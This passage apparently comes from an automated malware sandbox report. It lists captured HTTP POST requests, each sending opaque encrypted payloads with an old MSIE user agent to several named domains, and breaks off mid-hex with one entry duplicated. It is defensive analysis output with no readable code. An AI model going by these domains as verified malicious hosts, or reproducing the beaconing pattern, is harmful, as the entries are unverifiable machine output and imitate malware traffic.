NvYCnHQYHQ6CPcecz2n77sf/rtJs0sRw6HxYjSvMyapZjK8kVeBagqnN98Lm0sBc2jh/V3lWkToK868Z9W9YaMhiJ5zQfVJOa2x+ZD9KNLOvGhmc65iGkbxje6WusfvgMrRH6VQHSrX5dfSQy/ZnYcIpnG9JVsHnamfWNaBa4AJKOkoY0UaBVsSD+PTO0rVRF8dK37bgSRReVVk/5R9gu396YMHJ7aQujzdvOXCkJH7nBq1jfLSG++l+3z7/TY705BhbUxk2BcjCOT0eLut+Ei17LDdp1ObywPP9sj84UaR+GuesD64ZDOqz6mrPGYfP84vjgADZSunLNZVRqfamJZbEcb4l87J5K/7i8+2T3Nmh/1QYHQ9sWp1OI+H41dQlM+0Fd7LhHVvGDXBBBkEAcG7ZDsf7SgPRjXsh+SnitHuu548I0cRWaSpqdeQZesOoGdHUeKyAfjfk3B4PjmP5iLZ2S24J9TTh5ME3IcO9L8IiSOUI2wZM8UpLJzUEqocbv14rnUsuaaS8whWCKEu6CksI6sxOsaM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.spanesi.comCache-Control: no-cacheData Raw: 38 4e 56 54 57 70 31 47 49 77 34 33 67 2f 38 36 31 42 65 78 35 39 59 77 55 74 64 4c 57 74 7a 69 49 56 6e 67 5a 68 35 42 71 76 45 2f 7a 54 7a 34 2b 4c 53 55 48 61 4a 30 56 4c 6e 44 63 61 34 6c 45 45 37 79 64 4b 38 37 78 6d 36 70 70 55 41 6d 6b 45 42 49 6f 53 31 52 63 74 6f 6c 78 48 67 34 45 53 63 37 45 35 56 74 30 57 53 6a 41 37 4e 56 67 34 67 56 4f 45 73 52 47 44 5a 62 5a 63 50 42 77 6b 74 35 6e 64 7a 65 53 77 48 2b 44 64 2f 4a 50 56 43 44 66 2f 56 46 66 2b 62 70 48 4b 79 58 77 73 68 74 46 52 74 44 73 33 64 34 41 59 59 76 59 64 68 58 64 73 57 78 68 75 5a 2f 6d 35 63 50 38 45 47 4c 41 4e 57 6e 74 4f 57 71 47 64 75 54 76 4a 72 78 79 77 47 4e 50 68 58 45 70 6f 32 63 68 30 42 73 55 46 41 61 42 2b 42 47 41 45 49 2b 58 58 37 79 51 31 62 77 47 58 76 46 77 2f 70 74 50 6e 4c 78 69 53 42 2b 50 38 59 51 65 44 50 52 64 32 32 56 6a 30 32 6b 78 68 41 59 30 2f 43 71 64 73 2f 31 34 75 51 2b 79 57 51 47 45 63 74 54 49 57 73 4d 2f 61 61 41 2b 42 58 47 65 46 72 34 36 4f 4a 6a 34 52 68 56 75 64 63 59 4e 6d 47 42 62 54 2b 5a 55 63 75 59 48 6c 70 47 77 52 4b 6c 62 35 58 37 66 67 31 79 31 41 4a 67 43 7a 55 58 49 65 71 41 45 77 75 32 58 35 6f 46 73 34 7a 73 6a 6a 79 32 39 38 38 66 35 64 71 4c 54 73 38 5a 62 48 2b 58 65 53 73 48 67 54 70 55 32 6d 50 72 68 35 75 63 4b 39 66 44 6b 2b 38 48 44 70 6c 70 6e 78 4f 36 5a 2f 68 4f 47 73 68 74 76 79 47 41 45 4a 4f 4f 57 76 48 76 46 4b 4b 32 39 71 72 42 54 6d 6e 61 35 32 49 46 31 2f 7a 64 41 79 2b 4d 67 4b 70 62 72 64 7a 70 30 42 33 45 32 61 65 39 41 63 7a 50 6f 47 48 51 69 62 66 4a 6f 73 68 70 59 45 5a 57 64 79 49 4b 68 4f 31 38 61 53 7a 6a 50 38 74 69 71 37 36 67 71 30 62 39 54 65 4e 46 57 41 3d 3d Data Ascii: 8NVTWp1GIw43g/861Bex59YwUtdLWtziIVngZh5BqvE/zTz4+LSUHaJ0VLnDca4lEE7ydK87xm6ppUAmkEBIoS1RctolxHg4ESc7E5Vt0WSjA7NVg4gVOEsRGDZbZcPBwkt5ndzeSwH+Dd/JPVCDf/VFf+bpHKyXwshtFRtDs3d4AYYvYdhXdsWxhuZ/m5cP8EGLANWntOWqGduTvJrxywGNPhXEpo2ch0BsUFAaB+BGAEI+XX7yQ1bwGXvFw/ptPnLxiSB+P8YQeDPRd22Vj02kxhAY0/Cqds/14uQ+yWQGEctTIWsM/aaA+BXGeFr46OJj4RhVudcYNmGBbT+ZUcuYHlpGwRKlb5X7fg1y1AJgCzUXIeqAEwu2X5oFs4zsjjy2988f5dqLTs8ZbH+XeSsHgTpU2mPrh5ucK9fDk+8HDplpnxO6Z/hOGshtvyGAEJOOWvHvFKK29qrBTmna52IF1/zdAy+MgKpbrdzp0B3E2ae9AczPoGHQibfJoshpYEZWdyIKhO18aSzjP8tiq76gq0b9TeNFWA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tc17.comCache-Control: no-cacheData Raw: 37 38 34 61 4f 76 6d 4b 4b 67 34 30 4e 52 38 30 69 44 68 49 65 70 4a 68 7a 37 44 58 2b 2f 36 52 50 52 30 70 68 56 61 70 72 44 72 6e 73 4f 2f 65 49 48 66 55 65 76 56 52 4c 43 74 79 62 30 73 77 39 38 33 4b 72 34 61 7a 64 6f 61 2f 68 42 44 39 49 59 53 63 67 39 53 4d 4a 77 47 33 36 71 74 6e 64 70 45 74 41 39 52 66 32 4d 4a 74 6b 6e 45 5a 48 38 38 5a 59 32 31 6b 62 64 49 58 53 44 6a 32 50 66 4d 4d 39 63 30 39 59 6d 41 44 44 67 62 59 31 46 35 71 6d 45 5a 2f 43 79 39 37 51 45 34 43 30 59 36 61 4f 58 4d 39 50 72 4d 38 57 2b 64 73 56 41 33 52 2f 6e 50 5a 70 64 48 65 32 36 55 65 35 65 69 62 63 64 78 6b 51 58 78 76 56 41 39 7a 7a 45 36 36 50 54 62 43 6d 75 38 4a 4a 49 67 72 6e 56 6a 7a 79 47 59 33 31 37 56 33 7a 45 42 33 57 45 6f 67 53 6f 55 6f 5a 52 42 4e 50 76 72 5a 66 6e 75 35 56 78 50 31 68 73 6d 4d 46 55 37 52 2b 52 36 55 43 35 4f 65 41 56 56 42 41 59 52 44 64 65 4e 6a 39 6d 69 69 30 66 63 54 57 48 70 54 47 50 4e 69 68 4e 62 71 76 47 66 6e 35 42 74 51 36 59 38 63 51 68 5a 76 4f 36 79 48 4d 50 55 7a 6e 54 6e 57 30 6f 53 51 51 79 32 30 4d 69 57 31 75 33 38 36 52 43 46 50 62 55 76 42 74 38 75 47 59 63 43 67 69 75 2b 33 59 36 68 73 70 44 53 6c 74 35 30 37 4d 6e 49 4e 71 64 59 6d 42 4e 4c 53 4c 4c 54 47 55 68 74 47 76 2b 67 4e 52 6e 44 42 47 6e 41 74 45 4c 2f 76 2f 4a 45 54 55 55 53 70 4c 6c 33 65 50 36 6e 32 46 64 4e 67 63 6b 2f 39 52 7a 53 53 37 59 35 78 38 37 32 73 2b 6a 41 71 5a 76 74 72 71 73 32 43 31 53 6e 36 44 64 62 79 2f 6b 46 74 4a 37 6e 32 4a 4e 33 72 67 44 61 79 2f 52 58 6c 42 76 63 4f 43 67 49 75 4a 47 53 6a 75 43 73 33 7a 4f 69 30 33 63 36 45 44 64 67 5a 34 69 64 4a 39 4e 46 63 4e 6a 52 67 46 75 53 4b 41 6f 61 31 62 73 4e 43 38 75 56 2f 67 31 35 65 63 51 3d 3d Data Ascii: 784aOvmKKg40NR80iDhIepJhz7DX+/6RPR0phVaprDrnsO/eIHfUevVRLCtyb0sw983Kr4azdoa/hBD9IYScg9SMJwG36qtndpEtA9Rf2MJtknEZH88ZY21kbdIXSDj2PfMM9c09YmADDgbY1F5qmEZ/Cy97QE4C0Y6aOXM9PrM8W+dsVA3R/nPZpdHe26Ue5eibcdxkQXxvVA9zzE66PTbCmu8JJIgrnVjzyGY317V3zEB3WEogSoUoZRBNPvrZfnu5VxP1hsmMFU7R+R6UC5OeAVVBAYRDdeNj9mii0fcTWHpTGPNihNbqvGfn5BtQ6Y8cQhZvO6yHMPUznTnW0oSQQy20MiW1u386RCFPbUvBt8uGYcCgiu+3Y6hspDSlt507MnINqdYmBNLSLLTGUhtGv+gNRnDBGnAtEL/v/JETUUSpLl3eP6n2FdNgck/9RzSS7Y5x872s+jAqZvtrqs2C1Sn6Ddby/kFtJ7n2JN3rgDay/RXlBvcOCgIuJGSjuCs3zOi03c6EDdgZ4idJ9NFcNjRgFuSKAoa1bsNC8uV/g15ecQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tc17.comCache-Control: no-cacheData Raw: 37 38 34 61 4f 76 6d 4b 4b 67 34 30 4e 52 38 30 69 44 68 49 65 70 4a 68 7a 37 44 58 2b 2f 36 52 50 52 30 70 68 56 61 70 72 44 72 6e 73 4f 2f 65 49 48 66 55 65 76 56 52 4c 43 74 79 62 30 73 77 39 38 33 4b 72 34 61 7a 64 6f 61 2f 68 42 44 39 49 59 53 63 67 39 53 4d 4a 77 47 33 36 71 74 6e 64 70 45 74 41 39 52 66 32 4d 4a 74 6b 6e 45 5a 48 38 38 5a 59 32 31 6b 62 64 49 58 53 44 6a 32 50 66 4d 4d 39 63 30 39 59 6d 41 44 44 67 62 59 31 46 35 71 6d 45 5a 2f 43 79 39 37 51 45 34 43 30 59 36 61 4f 58 4d 39 50 72 4d 38 57 2b 64 73 56 41 33 52 2f 6e 50 5a 70 64 48 65 32 36 55 65 35 65 69 62 63 64 78 6b 51 58 78 76 56 41 39 7a 7a 45 36 36 50 54 62 43 6d 75 38 4a 4a 49 67 72 6e 56 6a 7a 79 47 59 33 31 37 56 33 7a 45 42 33 57 45 6f 67 53 6f 55 6f 5a 52 42 4e 50 76 72 5a 66 6e 75 35 56 78 50 31 68 73 6d 4d 46 55 37 52 2b 52 36 55 43 35 4f 65 41 56 56 42 41 59 52 44 64 65 4e 6a 39 6d 69 69 30 66 63 54 57 48 70 54 47 50 4e 69 68 4e 62 71 76 47 66 6e 35 42 74 51 36 59 38 63 51 68 5a 76 4f 36 79 48 4d 50 55 7a 6e 54 6e 57 30 6f 53 51 51 79 32 30 4d 69 57 31 75 33 38 36 52 43 46 50 62 55 76 42 74 38 75 47 59 63 43 67 69 75 2b 33 59 36 68 73 70 44 53 6c 74 35 30 37 4d 6e 49 4e 71 64 59 6d 42 4e 4c 53 4c 4c 54 47 55 68 74 47 76 2b 67 4e 52 6e 44 42 47 6e 41 74 45 4c 2f 76 2f 4a 45 54 55 55 53 70 4c 6c 33 65 50 36 6e 32 46 64 4e 67 63 6b 2f 39 52 7a 53 53 37 59 35 78 38 37 32 73 2b 6a 41 71 5a 76 74 72 71 73 32 43 31 53 6e 36 44 64 62 79 2f 6b 46 74 4a 37 6e 32 4a 4e 33 72 67 44 61 79 2f 52 58 6c 42 76 63 4f 43 67 49 75 4a 47 53 6a 75 43 73 33 7a 4f 69 30 33 63 36 45 44 64 67 5a 34 69 64 4a 39 4e 46 63 4e 6a 52 67 46 75 53 4b 41 6f 61 31 62 73 4e 43 38 75 56 2f 67 31 35 65 63 51 3d 3d Data Ascii: 784aOvmKKg40NR80iDhIepJhz7DX+/6RPR0phVaprDrnsO/eIHfUevVRLCtyb0sw983Kr4azdoa/hBD9IYScg9SMJwG36qtndpEtA9Rf2MJtknEZH88ZY21kbdIXSDj2PfMM9c09YmADDgbY1F5qmEZ/Cy97QE4C0Y6aOXM9PrM8W+dsVA3R/nPZpdHe26Ue5eibcdxkQXxvVA9zzE66PTbCmu8JJIgrnVjzyGY317V3zEB3WEogSoUoZRBNPvrZfnu5VxP1hsmMFU7R+R6UC5OeAVVBAYRDdeNj9mii0fcTWHpTGPNihNbqvGfn5BtQ6Y8cQhZvO6yHMPUznTnW0oSQQy20MiW1u386RCFPbUvBt8uGYcCgiu+3Y6hspDSlt507MnINqdYmBNLSLLTGUhtGv+gNRnDBGnAtEL/v/JETUUSpLl3eP6n2FdNgck/9RzSS7Y5x872s+jAqZvtrqs2C1Sn6Ddby/kFtJ7n2JN3rgDay/RXlBvcOCgIuJGSjuCs3zOi03c6EDdgZ4idJ9NFcNjRgFuSKAoa1bsNC8uV/g15ecQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.baijaku.comCache-Control: no-cacheData Raw: 6c 39 35 67 42 72 35 4c 2f 77 30 48 56 54 6c 45 69 59 41 68 45 4b 46 7a 6f 65 64 2b 45 49 64 72 30 67 2b 35 63 46 4b 74 6d 71 49 32 36 49 65 54 32 44 78 39 5a 65 73 47 66 31 5a 38 2f 4e 4f 30 69 5a 64 53 4c 4c 4e 49 50 71 6f 4b 58 31 4b 38 54 6b 55 6f 64 4b 55 31 5a 32 34 63 54 2b 65 48 74 39 2b 76 6b 47 50 78 44 64 37 4a 64 63 78 50 61 52 53 58 72 66 52 4d 6a 4e 65 4e 53 33 2b 30 34 63 45 6f 65 36 42 50 54 64 35 4c 77 34 45 49 6d 51 57 4d 77 6c 6a 47 53 6c 5a 75 58 42 37 4b 62 47 39 4f 36 63 6f 39 6a 65 74 71 2b 50 63 6f 4e 57 41 6c 66 39 42 73 57 6f 44 32 32 47 35 53 2f 4f 57 72 68 45 4c 43 71 48 6d 64 48 47 46 6e 4d 68 71 52 70 77 73 36 37 35 76 65 6a 32 76 4b 73 36 66 32 39 52 73 58 59 49 70 72 72 41 51 37 49 41 64 6c 78 31 75 51 69 67 32 54 2f 38 6c 4a 71 5a 48 44 39 65 42 7a 5a 43 49 41 7a 4d 53 53 30 64 49 70 41 34 67 62 62 46 58 36 54 74 4e 50 50 36 42 68 6c 5a 54 36 45 52 57 34 46 50 62 76 7a 62 30 70 35 41 49 36 61 34 43 76 73 34 49 38 57 32 41 54 6a 65 52 2b 41 6a 4e 4f 6e 39 30 6f 68 4a 45 79 57 32 41 7a 62 51 2f 61 64 38 53 55 55 6b 44 64 36 66 70 74 7a 6b 2b 77 54 67 48 6b 75 4a 56 37 4c 74 51 4f 48 6f 54 2f 4f 65 69 48 51 4a 4b 64 52 4c 5a 30 48 69 61 4d 57 66 43 59 2f 71 4e 77 32 46 43 55 33 36 36 6e 56 4d 73 72 39 59 56 59 50 70 69 50 36 32 4c 4e 66 62 6f 48 52 41 48 37 6d 62 79 30 62 51 62 79 66 52 38 37 79 36 41 64 77 41 78 30 73 49 4d 46 38 32 44 77 70 47 56 75 75 66 4c 50 74 71 64 54 6f 63 2f 62 45 7a 34 47 39 48 76 5a 4f 6a 4a 49 72 4f 35 72 69 54 30 4c 4b 5a 53 58 70 50 4d 38 46 69 75 66 54 47 4f 44 68 4f 6e 70 44 63 4e 31 64 76 48 47 78 4c 4c 52 61 45 30 3d Data Ascii: l95gBr5L/w0HVTlEiYAhEKFzoed+EIdr0g+5cFKtmqI26IeT2Dx9ZesGf1Z8/NO0iZdSLLNIPqoKX1K8TkUodKU1Z24cT+eHt9+vkGPxDd7JdcxPaRSXrfRMjNeNS3+04cEoe6BPTd5Lw4EImQWMwljGSlZuXB7KbG9O6co9jetq+PcoNWAlf9BsWoD22G5S/OWrhELCqHmdHGFnMhqRpws675vej2vKs6f29RsXYIprrAQ7IAdlx1uQig2T/8lJqZHD9eBzZCIAzMSS0dIpA4gbbFX6TtNPP6BhlZT6ERW4FPbvzb0p5AI6a4Cvs4I8W2ATjeR+AjNOn90ohJEyW2AzbQ/ad8SUUkDd6fptzk+wTgHkuJV7LtQOHoT/OeiHQJKdRLZ0HiaMWfCY/qNw2FCU366nVMsr9YVYPpiP62LNfboHRAH7mby0bQbyfR87y6AdwAx0sIMF82DwpGVuufLPtqdToc/bEz4G9HvZOjJIrO5riT0LKZSXpPM8FiufTGODhOnpDcN1dvHGxLLRaE0=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.elpro.siCache-Control: no-cacheData Raw: 75 68 57 32 77 37 79 79 4a 67 34 6c 70 51 79 4a 5a 2b 37 34 30 30 2b 31 4e 34 52 55 50 75 6f 4d 73 4a 63 49 73 52 2f 71 33 6c 77 49 6c 38 65 50 64 57 63 5a 59 39 53 44 76 50 56 6a 42 6f 57 63 45 30 67 4d 62 4c 2f 65 30 44 31 6d 2f 33 72 53 68 50 4b 66 66 4e 43 70 77 69 77 55 4f 4c 2b 34 72 6d 4d 67 35 6b 79 78 52 31 55 4f 59 73 2f 77 41 52 6d 4a 42 64 49 67 7a 78 4f 48 6b 43 37 6e 44 54 51 63 77 34 4e 57 34 6f 57 38 67 79 65 7a 45 64 6c 47 2b 57 65 55 4d 44 4e 36 44 35 30 57 51 6a 37 55 36 68 77 46 56 57 72 4a 6d 5a 6e 6e 31 73 6e 62 72 73 66 4e 39 50 57 68 74 6e 6f 38 75 72 31 6d 46 65 6b 46 5a 4f 38 54 58 34 4b 53 35 79 68 6c 37 48 35 34 65 68 66 30 4f 4a 77 56 59 67 4a 33 66 53 76 31 41 4a 5a 2f 35 77 62 34 73 6b 48 76 47 59 39 71 6e 5a 32 52 4f 50 78 67 2b 69 64 34 71 30 4f 42 79 77 2b 59 48 2f 4c 79 4d 31 77 33 49 6b 33 63 41 55 52 6f 36 47 48 6d 43 77 38 74 2b 2f 66 4d 41 2b 55 6e 69 65 2b 59 57 4f 55 41 51 49 41 35 58 4b 51 42 73 44 71 59 31 73 34 6b 53 34 6d 56 57 45 2f 33 32 38 41 47 72 54 45 45 4d 66 44 6e 4e 30 59 58 39 75 62 48 4f 45 4d 38 38 55 7a 36 74 61 76 30 6b 51 4e 46 47 65 6b 79 34 62 6f 62 37 4c 79 67 58 58 75 42 53 32 61 49 30 41 41 2f 45 30 57 31 4e 76 4f 7a 61 44 7a 61 41 2b 2f 4a 47 65 6b 63 56 59 30 5a 5a 50 39 31 39 53 42 77 36 73 53 36 33 63 65 72 6f 51 37 33 30 75 64 4d 78 45 72 2b 54 79 34 5a 37 2b 64 39 36 4e 63 71 58 55 36 32 6a 30 34 70 6c 4c 78 5a 77 76 79 4f 57 32 6a 57 31 47 51 48 6c 37 6e 65 70 39 56 34 36 54 62 44 6a 68 44 74 43 4f 4c 57 36 72 68 7a 44 32 4b 56 78 2f 57 48 30 44 64 75 56 78 49 6d 39 55 37 35 71 33 78 41 47 55 39 68 32 76 7a 58 69 4b 59 74 Data Ascii: uhW2w7yyJg4lpQyJZ+7400+1N4RUPuoMsJcIsR/q3lwIl8ePdWcZY9SDvPVjBoWcE0gMbL/e0D1m/3rShPKffNCpwiwUOL+4rmMg5kyxR1UOYs/wARmJBdIgzxOHkC7nDTQcw4NW4oW8gyezEdlG+WeUMDN6D50WQj7U6hwFVWrJmZnn1snbrsfN9PWhtno8ur1mFekFZO8TX4KS5yhl7H54ehf0OJwVYgJ3fSv1AJZ/5wb4skHvGY9qnZ2ROPxg+id4q0OByw+YH/LyM1w3Ik3cAURo6GHmCw8t+/fMA+Unie+YWOUAQIA5XKQBsDqY1s4kS4mVWE/328AGrTEEMfDnN0YX9ubHOEM88Uz6tav0kQNFGeky4bob7LygXXuBS2aI0AA/E0W1NvOzaDzaA+/JGekcVY0ZZP919SBw6sS63ceroQ730udMxEr+Ty4Z7+d96NcqXU62j04plLxZwvyOW2jW1GQHl7nep9V46TbDjhDtCOLW6rhzD2KVx/WH0DduVxIm9U75q3xAGU9h2vzXiKYt
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.depalo.comCache-Control: no-cacheData Raw: 44 5a 31 55 7a 31 55 54 4a 77 34 53 76 36 34 67 50 4d 78 72 61 55 35 36 70 6f 64 6a 34 59 6b 7a 57 56 32 35 45 61 39 4c 32 64 50 61 37 45 66 41 51 4b 6b 62 58 76 4e 50 61 63 6c 4e 4c 41 56 66 2f 6a 62 4e 30 6d 63 47 54 4b 6b 49 65 62 49 4e 79 68 36 67 71 70 48 63 33 70 68 53 4f 5a 4b 59 4c 57 2b 62 6a 58 4b 4d 50 71 6f 44 43 73 31 43 4e 61 74 57 37 4a 38 39 2f 79 74 59 79 4e 4c 69 70 74 50 38 41 67 32 49 34 6b 51 42 34 4b 49 44 66 55 33 38 75 4d 74 6f 59 41 45 66 74 57 37 49 74 39 46 42 65 5a 36 65 44 66 58 79 37 7a 53 57 4e 76 57 56 42 48 47 4f 55 4a 6c 66 50 65 4d 49 31 6a 6e 73 73 4e 49 4c 67 70 67 4b 56 54 46 47 57 50 6f 75 37 44 48 7a 47 44 59 7a 4e 31 67 4b 54 62 42 74 49 4e 61 6a 71 43 78 75 47 33 4d 67 64 2f 62 73 43 77 6e 4d 48 42 54 58 6e 33 43 33 69 63 69 49 72 4a 41 72 34 78 39 68 66 6d 31 4e 4b 46 57 66 33 6c 4f 2f 67 44 52 4d 50 2b 4a 43 66 44 6b 42 61 72 33 30 41 72 72 4f 56 73 30 38 73 6e 66 36 72 4c 42 62 77 2b 59 52 34 68 32 79 75 32 4c 57 4a 41 63 67 41 74 6c 5a 4d 67 6f 4b 71 4f 31 61 63 44 62 43 4b 48 4c 69 37 45 4d 68 74 79 34 69 77 45 2b 65 43 64 4a 38 62 6d 30 68 57 31 4d 6b 42 4c 73 4f 5a 74 35 55 31 4d 72 44 66 45 61 6e 55 56 38 76 53 4c 75 54 5a 61 44 7a 51 31 64 6d 6f 77 46 53 6d 68 42 72 56 49 57 44 41 6a 78 6d 38 74 54 36 62 6b 48 47 48 68 59 54 51 58 38 39 43 79 5a 44 6e 61 68 38 50 4e 79 38 4e 73 68 65 43 47 77 6a 36 65 77 55 57 42 6f 37 47 72 48 30 56 69 54 4d 37 73 44 42 63 4c 79 42 33 35 67 33 34 35 42 34 46 57 4e 2b 45 6d 64 5a 70 38 47 36 6a 67 4f 51 34 5a 79 47 75 77 72 45 70 66 55 75 4d 39 39 77 2f 48 32 58 34 33 77 42 4a 70 43 68 31 76 41 57 66 62 39 34 Data Ascii: DZ1Uz1UTJw4Sv64gPMxraU56podj4YkzWV25Ea9L2dPa7EfAQKkbXvNPaclNLAVf/jbN0mcGTKkIebINyh6gqpHc3phSOZKYLW+bjXKMPqoDCs1CNatW7J89/ytYyNLiptP8Ag2I4kQB4KIDfU38uMtoYAEftW7It9FBeZ6eDfXy7zSWNvWVBHGOUJlfPeMI1jnssNILgpgKVTFGWPou7DHzGDYzN1gKTbBtINajqCxuG3Mgd/bsCwnMHBTXn3C3iciIrJAr4x9hfm1NKFWf3lO/gDRMP+JCfDkBar30ArrOVs08snf6rLBbw+YR4h2yu2LWJAcgAtlZMgoKqO1acDbCKHLi7EMhty4iwE+eCdJ8bm0hW1MkBLsOZt5U1MrDfEanUV8vSLuTZaDzQ1dmowFSmhBrVIWDAjxm8tT6bkHGHhYTQX89CyZDnah8PNy8NsheCGwj6ewUWBo7GrH0ViTM7sDBcLyB35g345B4FWN+EmdZp8G6jgOQ4ZyGuwrEpfUuM99w/H2X43wBJpCh1vAWfb94
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 4e 72 54 6b 69 2b 77 79 4c 51 34 4d 41 63 52 34 31 35 45 51 38 50 2b 55 45 7a 6c 45 75 6d 53 76 34 4c 6f 53 32 61 79 4c 2b 52 78 67 33 76 42 72 31 47 38 4c 68 35 44 61 58 6e 59 6d 5a 61 50 6d 47 54 42 6d 31 36 65 34 33 58 55 30 35 36 4e 51 37 4a 42 75 4c 6b 35 4d 52 47 7a 46 77 68 42 4f 56 6f 73 7a 6c 65 50 6f 66 72 51 63 50 30 72 38 31 35 34 2b 6a 5a 36 65 78 67 63 45 76 44 53 6f 2b 53 69 64 4c 54 52 4d 64 77 4a 44 7a 31 43 72 2f 73 37 5a 4b 63 59 39 37 66 45 41 4c 59 50 66 62 74 4e 2f 65 75 31 78 30 43 53 4a 68 4c 4d 4d 64 4c 42 37 75 68 6c 63 68 44 48 48 6b 71 7a 6d 64 59 45 44 5a 30 59 51 56 69 6e 4d 66 6b 4e 73 6e 38 4c 62 37 53 58 77 73 30 6f 76 50 49 73 49 4c 61 4d 61 65 73 73 78 54 63 70 4d 64 4e 73 33 4d 57 78 4a 6b 47 6c 38 69 74 77 2f 33 54 70 62 44 53 6c 6a 37 52 33 78 31 2f 4f 49 4a 32 74 32 66 48 55 63 38 71 52 63 61 6b 65 51 73 68 5a 39 6a 38 6f 69 30 73 67 34 6e 72 48 47 68 42 66 31 61 30 76 54 34 63 55 72 46 75 74 4b 6c 2f 39 4e 59 34 75 4d 6f 77 71 4c 45 73 78 32 5a 61 52 79 34 53 36 44 30 6a 6c 37 4f 46 45 4d 45 6a 54 46 6e 47 35 2f 53 4d 4f 31 79 46 44 6b 53 4c 45 43 6d 48 4b 6e 50 37 74 34 70 78 59 6a 62 2f 4a 33 33 4f 7a 62 59 53 53 72 79 44 35 54 74 2f 58 57 35 2f 4b 55 31 53 56 2f 35 48 62 42 6d 32 38 70 37 64 55 4c 6b 6a 58 4a 56 4e 36 4f 79 6e 74 49 74 47 53 31 4d 53 4b 76 48 48 55 44 77 36 72 4d 64 43 6c 64 37 6b 35 68 46 31 79 33 75 79 46 39 51 44 6f 56 71 36 58 55 75 53 76 4b 62 51 73 46 73 45 78 53 4f 6a 58 45 4d 67 38 6f 55 48 54 6c 79 46 73 62 54 38 6b 73 58 71 6e 38 35 48 4c 4c 4a 4a 61 58 31 36 42 72 59 59 76 71 63 39 6d 2b 61 47 32 43 56 36 45 74 42 34 45 4e 77 59 47 70 49 5a 49 55 38 49 69 61 68 48 64 44 78 51 75 6f 6e 7a 4c 46 7a 2f 73 2f 72 32 6e 6f 69 69 62 58 65 49 45 3d Data Ascii: NrTki+wyLQ4MAcR415EQ8P+UEzlEumSv4LoS2ayL+Rxg3vBr1G8Lh5DaXnYmZaPmGTBm16e43XU056NQ7JBuLk5MRGzFwhBOVoszlePofrQcP0r8154+jZ6exgcEvDSo+SidLTRMdwJDz1Cr/s7ZKcY97fEALYPfbtN/eu1x0CSJhLMMdLB7uhlchDHHkqzmdYEDZ0YQVinMfkNsn8Lb7SXws0ovPIsILaMaessxTcpMdNs3MWxJkGl8itw/3TpbDSlj7R3x1/OIJ2t2fHUc8qRcakeQshZ9j8oi0sg4nrHGhBf1a0vT4cUrFutKl/9NY4uMowqLEsx2ZaRy4S6D0jl7OFEMEjTFnG5/SMO1yFDkSLECmHKnP7t4pxYjb/J33OzbYSSryD5Tt/XW5/KU1SV/5HbBm28p7dULkjXJVN6OyntItGS1MSKvHHUDw6rMdCld7k5hF1y3uyF9QDoVq6XUuSvKbQsFsExSOjXEMg8oUHTlyFsbT8ksXqn85HLLJJaX16BrYYvqc9m+aG2CV6EtB4ENwYGpIZIU8IiahHdDxQuonzLFz/s/r2noiibXeIE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 38 32 66 62 31 45 5a 42 4a 77 37 39 73 71 53 75 59 53 64 46 2b 47 6c 71 2f 30 75 6d 32 43 67 4f 32 74 45 78 61 77 33 34 47 36 41 38 35 49 47 71 53 6f 4b 7a 73 38 30 46 75 32 41 53 49 74 70 6c 4b 76 41 62 44 7a 68 38 4a 45 6f 66 41 2b 45 53 30 31 44 72 4e 6c 37 56 47 6b 6b 38 62 31 62 4f 69 55 75 36 54 49 76 6d 6a 65 2f 73 41 66 50 6a 55 31 55 50 6c 61 65 7a 6e 49 71 38 66 62 76 56 46 44 66 62 49 44 4e 2b 68 32 44 2f 50 50 75 73 69 43 62 62 6b 42 49 7a 78 38 49 73 56 54 51 56 50 78 53 2f 6e 6f 39 4f 72 50 4f 73 4d 67 6a 67 71 71 2f 33 41 76 56 70 57 66 53 69 77 43 48 6c 33 79 67 36 35 62 49 79 72 39 37 7a 44 77 71 66 45 6c 58 62 62 33 31 41 35 68 38 6e 34 4c 52 6a 66 69 50 45 55 51 42 4e 62 54 58 76 33 63 4a 31 49 57 38 76 74 6d 32 63 52 75 78 52 4a 2b 4d 56 4f 74 6b 50 34 72 72 6a 31 4d 6e 71 43 6e 61 61 46 44 35 6b 2b 4f 4b 2f 5a 71 6e 56 72 62 47 30 68 61 69 2b 66 38 56 6f 4d 75 33 72 31 63 68 2f 52 2b 78 78 38 32 79 75 38 51 55 48 51 71 76 74 64 76 45 58 6c 58 65 4f 64 49 48 43 51 46 39 4a 39 59 65 4e 35 44 6d 73 31 2b 36 66 6b 42 62 75 70 55 2f 39 75 43 5a 66 68 6f 6f 76 61 33 73 41 42 70 4e 42 4d 73 67 42 2b 39 55 31 56 45 33 59 59 46 78 2b 6c 6e 75 61 76 75 42 4b 59 65 76 44 63 41 54 4d 56 63 4e 52 58 49 51 7a 69 4b 43 70 34 4b 57 4a 30 72 7a 51 79 6f 4c 59 31 30 77 67 56 52 46 6f 43 53 45 4a 